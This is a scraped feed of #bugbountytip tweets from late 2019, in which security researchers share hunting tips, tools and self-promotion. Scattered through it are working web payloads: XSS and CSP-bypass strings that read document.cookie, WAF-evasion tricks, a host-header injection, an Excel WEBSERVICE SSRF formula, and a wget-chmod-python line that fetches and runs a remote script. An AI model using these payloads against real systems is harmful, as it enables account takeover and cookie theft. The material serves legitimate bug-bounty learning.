2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It ay be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSS´ payload, shake dice. 🎲 <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluz🔥
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability 🤑🤑🤑🤑 https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluz🔥
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast in the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as a guests 🥳 #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! It release is specially dedicated to @SlackHQ! An issue that prevent pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parammeter polution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if its vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN Th✪sH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, its not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can reck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluz🔥
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got an really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluz🔥
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap…https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Λявєη
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, its a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If your struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If your not looking for these on your bug bounties your missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$💪👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke 😁 I really like it's Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading an malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I‘m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! 😏 Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 🇦🇷
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble 🙏 #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip 💪 Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix it's #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💸 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌴
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07
4 one of my bypasses in script context: 1')});x=(document),y=x.cookie;(alert)(y);function r(){a('b bypasses to alert cookie which was restricted, also finishes some function #XSS #WAFbypass #bugbountytip @zseano @brutelogic
intigriti
@intigriti


2019-09-23 13:45:34
16 Open your eyes and see: there is more than S3! 👀 @hussein98d recommends cloud_enum to find unprotected Google Cloud buckets and Microsoft Azure storage accounts! 📦🔓#BugBountyTip 👉 https://t.co/jdufh0L7fR https://t.co/OqRtTIanb5
Anas Mahmood 🇵🇰
@AnasIsHere


2019-09-23 06:25:43
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside javascript & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the javascript, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:52:18
2 Google will pay you $1,000 to hack some of Android’s most popular apps Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/P5Zgaqbfaw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:50:26
0 Google’s bug bounty programs paid out almost $3M in 2017 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops https://t.co/YYTW4ja3WZ
Anas Mahmood 🇵🇰
@AnasIsHere


2019-09-23 05:46:25
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside script tag & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the script tag, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:44:03
3 Facebook expands bug bounty program to include third-party apps and websites Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/JbayjPAGUw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:41:34
